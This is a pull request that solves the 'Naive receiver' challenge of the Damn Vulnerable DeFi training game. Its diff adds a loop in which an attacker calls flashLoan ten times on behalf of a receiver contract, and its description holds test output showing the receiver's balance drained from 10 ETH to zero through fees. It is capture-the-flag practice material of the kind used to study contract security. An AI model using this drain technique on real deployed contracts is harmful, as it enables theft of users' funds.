### PR TITLE
Solution to naive receiver

### DIFF
--- a/test/naive-receiver/naive-receiver.challenge.js
+++ b/test/naive-receiver/naive-receiver.challenge.js
@@ -30,7 +30,11 @@ describe('[Challenge] Naive receiver', function () {
     });
 
     it('Exploit', async function () {
-        /** CODE YOUR EXPLOIT HERE */   
+        /** CODE YOUR EXPLOIT HERE */
+        for (i = 1; i <= 10; i++) {
+            await this.pool.connect(attacker).flashLoan(this.receiver.address, 0)
+            console.log(i, String(await ethers.provider.getBalance(this.receiver.address)))
+        }   
     });
 
     after(async function () {


### PR DESCRIPTION
damn-vulnerable-defi-v2$ yarn run naive-receiver
yarn run v1.22.19
$ yarn hardhat test test/naive-receiver/naive-receiver.challenge.js
$ damn-vulnerable-defi-v2/node_modules/.bin/hardhat test test/naive-receiver/naive-receiver.challenge.js
(node:3897) [DEP0147] DeprecationWarning: In future versions of Node.js, fs.rmdir(path, { recursive: true }) will be removed. Use fs.rm(path, { recursive: true }) instead
(Use `node --trace-deprecation ...` to show where the warning was created)


  [Challenge] Naive receiver
1 9000000000000000000
2 8000000000000000000
3 7000000000000000000
4 6000000000000000000
5 5000000000000000000
6 4000000000000000000
7 3000000000000000000
8 2000000000000000000
9 1000000000000000000
10 0
    ✓ Exploit (152ms)


  1 passing (1s)

Done in 18.06s.